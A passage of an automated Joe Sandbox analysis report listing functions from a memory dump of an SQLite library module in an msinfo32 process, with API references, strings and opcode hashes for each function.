                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a93de50c598dbb1b33a176bbe8ed0008f94d3f75d8cf630fecffdb0bbd3989cd
                                                                                                              • Instruction ID: c522bc388e0ba9ac8844ce6354786ec7c9fc39114b924ed26ac21fe5c28efd58
                                                                                                              • Opcode Fuzzy Hash: a93de50c598dbb1b33a176bbe8ed0008f94d3f75d8cf630fecffdb0bbd3989cd
                                                                                                              • Instruction Fuzzy Hash: 90E0EC763092085FBB40CD99ACD0A2677DAF79812CB24C136ED18CB305EA32D9104660
                                                                                                              Function 61E285E2 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                                                                                              • Instruction ID: 9e6e90ec920229668782eb68a2098b7b7fed8534ec208d789a627608c88741d7
                                                                                                              • Opcode Fuzzy Hash: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                                                                                              • Instruction Fuzzy Hash: 6CD042B450530DABDB00CF05D8C099ABBA8FB08364F50C119ED1847341C371E9508AA0
                                                                                                              Function 61E28676 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                                                                                              • Instruction ID: 4248dcf0bf4af482870b83a5a4203603e910368983d5090c3a7f3c4823f2e081
                                                                                                              • Opcode Fuzzy Hash: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                                                                                              • Instruction Fuzzy Hash: 57D042B450530DABDB00CF05D8C599ABBA8FB08264F50C119ED1847341C371E9508AA0
                                                                                                              Function 61E032B9 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74bd47e5a56efec07af792e7fa13408cba0d8239387265c8b2ef29a2ad9e996c
                                                                                                              • Instruction ID: 594a02a3e34eb1d4e321d7026c08e77dcf265e647233ca163f9c34190aad7892
                                                                                                              • Opcode Fuzzy Hash: 74bd47e5a56efec07af792e7fa13408cba0d8239387265c8b2ef29a2ad9e996c
                                                                                                              • Instruction Fuzzy Hash: 4AC012303443088BEB40CAAED440A6633E8BB04A25F50C060F84CCB700DA30FA218688
                                                                                                              Function 61E032A7 Relevance: .0, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                                              • Instruction ID: 50be5d58a59c62816cb7a21ca9e116e9e531976ec67ec3a9bf50fa4ed4933468
                                                                                                              • Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                                              • Instruction Fuzzy Hash: D4B092206146098AAB08CE989480E7777AEBBD8E09728C465A81C8AA09E731E891D2C0
                                                                                                              Function 61E321DC Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 244COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E322BF
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E322FD
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E32328
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32488
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E324A0
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E324DF
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3255B
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E32590
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3260C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_appendsqlite3_str_appendf$sqlite3_str_appendall
                                                                                                              • String ID: %s=?$0$<expr>$>? AND rowid<$ANY(%s)$AUTOMATIC COVERING INDEX$AUTOMATIC PARTIAL COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH$d$rowid
                                                                                                              • API String ID: 3937484358-3012697695
                                                                                                              • Opcode ID: 6882c50c0b1b6850b709cce18eece3333a4564d841f4222bba26dcc21398b610
                                                                                                              • Instruction ID: 1b3482640f2a3b0896619f5f743b90c78d64ed0cefaad1a863c96eca3e014793
                                                                                                              • Opcode Fuzzy Hash: 6882c50c0b1b6850b709cce18eece3333a4564d841f4222bba26dcc21398b610
                                                                                                              • Instruction Fuzzy Hash: 41C128B4D093259BDB108F24C99175ABBF1AFD5308F21C8A9D88C9B391D374D981CF82
                                                                                                              Function 61E3D1EC Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 209COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D25E
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D28F
                                                                                                                • Part of subcall function 61E2245A: sqlite3_vsnprintf.SQLITE3 ref: 61E2247B
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D3D3
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D410
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D44B
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D47D
                                                                                                              • sqlite3_randomness.SQLITE3 ref: 61E3D499
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_randomnesssqlite3_vsnprintf
                                                                                                              • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
                                                                                                              • API String ID: 3041771859-3409217566
                                                                                                              • Opcode ID: a9ee31df8bdb1fa04bebee60734a2ef004e3fe092d686bf276967802286417f9
                                                                                                              • Instruction ID: 61fd35cb51673c58c57d358b30ef44a57cc73a86349e2d2918984235d290bf37
                                                                                                              • Opcode Fuzzy Hash: a9ee31df8bdb1fa04bebee60734a2ef004e3fe092d686bf276967802286417f9
                                                                                                              • Instruction Fuzzy Hash: F3817F74908B568FD7009F78899476EBBE1BFC5308FA4C92ED4898B345E778C842DB42
                                                                                                              Function 61E25566 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                                                                              • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                              • API String ID: 3752053736-2111127023
                                                                                                              • Opcode ID: e7c95a9d01a67d31522d9c6d3be1f12bbe997f9ad62422dacd1ce9c28830c883
                                                                                                              • Instruction ID: 2e3191e42838f75f66efd40bf58524408cd86e6b59767091f50ac708f5baf3db
                                                                                                              • Opcode Fuzzy Hash: e7c95a9d01a67d31522d9c6d3be1f12bbe997f9ad62422dacd1ce9c28830c883
                                                                                                              • Instruction Fuzzy Hash: F97149709487458FD700DF69C59469EBBF1AF89348F24C82EE889CB359E738C5458F82
                                                                                                              Function 61E39C55 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                                              • String ID: .$sqlite3_extension_init$te3_
                                                                                                              • API String ID: 2803375525-613441610
                                                                                                              • Opcode ID: b06ba8bf46ed4125aadabf994ea0b99f438a17ff1eb6aaed0f6d5427b6d726d5
                                                                                                              • Instruction ID: 457eb6b65f3326cc958bc39251aab57efa386546f4dd5fbd1c786671b86f3213
                                                                                                              • Opcode Fuzzy Hash: b06ba8bf46ed4125aadabf994ea0b99f438a17ff1eb6aaed0f6d5427b6d726d5
                                                                                                              • Instruction Fuzzy Hash: B2C1E5B4A056169FDB00DFA9C484A9EBBF0BF88314F24C529E8999B314DB34D841CB91
                                                                                                              Function 61E23EA0 Relevance: 28.6, APIs: 19, Instructions: 132COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E23EBA
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E23EC6
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23ED3
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E23EFB
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E23F07
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23F16
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E23F36
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E23F42
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23F51
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E23F7D
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E23F89
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23F97
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                                                                              • String ID:
                                                                                                              • API String ID: 2723203140-0
                                                                                                              • Opcode ID: ca789292387b7a611cfcb16e5917548ea30acae9f6698ebd3cc457044bcea27b
                                                                                                              • Instruction ID: 079c009047b4c6e22ff85497e6309bf0f466190783cb9558c195e2563b8ac34b
                                                                                                              • Opcode Fuzzy Hash: ca789292387b7a611cfcb16e5917548ea30acae9f6698ebd3cc457044bcea27b
                                                                                                              • Instruction Fuzzy Hash: 5F411EB0508B868AD300AF658991A5EBBF5FF8434CF35CD2EC4958B714E739D8819F42
                                                                                                              Function 61E397B2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 342COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                                                                                              • String ID: @$access$cache
                                                                                                              • API String ID: 1538829708-1361544076
                                                                                                              • Opcode ID: 11368abaab05e9ead6176cdd9542473cfb31e5e58d804cd936c9d930d57c0f6c
                                                                                                              • Instruction ID: 0c80c2399a82563a748d6396d27a0f3f9bd9f3be67db8fc2cafa5ae6b76f5bec
                                                                                                              • Opcode Fuzzy Hash: 11368abaab05e9ead6176cdd9542473cfb31e5e58d804cd936c9d930d57c0f6c
                                                                                                              • Instruction Fuzzy Hash: F9D14CB09083668BDB158FA9C48079EFBF1AFC9308F68C45ED8959B351DB35D842CB15
                                                                                                              Function 61E3D911 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 330COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D95E
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3D98A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3D997
                                                                                                              • sqlite3_mutex_alloc.SQLITE3 ref: 61E3D9ED
                                                                                                              • sqlite3_uri_boolean.SQLITE3 ref: 61E3DA15
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3DAAA
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3DAC9
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3DD1A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_free$sqlite3_mutex_allocsqlite3_mutex_leavesqlite3_snprintfsqlite3_uri_boolean
                                                                                                              • String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
                                                                                                              • API String ID: 1420044521-1629717226
                                                                                                              • Opcode ID: 523906f76656e0959a1ca5b19cb75f309ebad7a167829a397de1b2bfef9561e2
                                                                                                              • Instruction ID: bee715886535535ef55b01b9bb72e9052ddacf1fe289d5c6aaebceb41897d404
                                                                                                              • Opcode Fuzzy Hash: 523906f76656e0959a1ca5b19cb75f309ebad7a167829a397de1b2bfef9561e2
                                                                                                              • Instruction Fuzzy Hash: A4E134B4A083559FDB04DF68C584A59BBF0BF89308F65C96DE888DB355E734D841CB81
                                                                                                              Function 61E4AAD3 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 157COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E4AB3E
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AB49
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E4AB27
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E4AB67
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E4AB9E
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E4ABAF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_result_error_nomemsqlite3_value_textsqlite3_vmprintf
                                                                                                              • String ID: fts5_expr$fts5_expr_tcl
                                                                                                              • API String ID: 451670718-1556133414
